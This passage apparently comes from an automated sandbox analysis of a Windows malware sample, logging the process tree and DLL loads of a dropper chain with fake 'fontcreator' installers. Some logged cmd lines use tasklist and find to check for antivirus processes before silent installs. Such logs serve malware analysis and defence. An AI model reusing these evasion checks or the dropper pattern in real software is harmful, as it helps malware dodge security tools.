Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe "C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe "C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe "C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe "C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe Process created: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp "C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp" /SL5="$C0076,2820349,845824,C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Process created: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe "C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe" /VERYSILENT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe Process created: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp "C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp" /SL5="$50284,2820349,845824,C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe" /VERYSILENT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process created: C:\Users\user\AppData\Local\hangbird\Updater.exe "C:\Users\user\AppData\Local\hangbird\\Updater.exe" "C:\Users\user\AppData\Local\hangbird\\caliculus.csv"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe Process created: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp "C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp" /SL5="$30472,2820349,845824,C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Process created: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe "C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe" /VERYSILENT
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe Process created: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp "C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp" /SL5="$40474,2820349,845824,C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Section loaded: coreuicomponents.dll
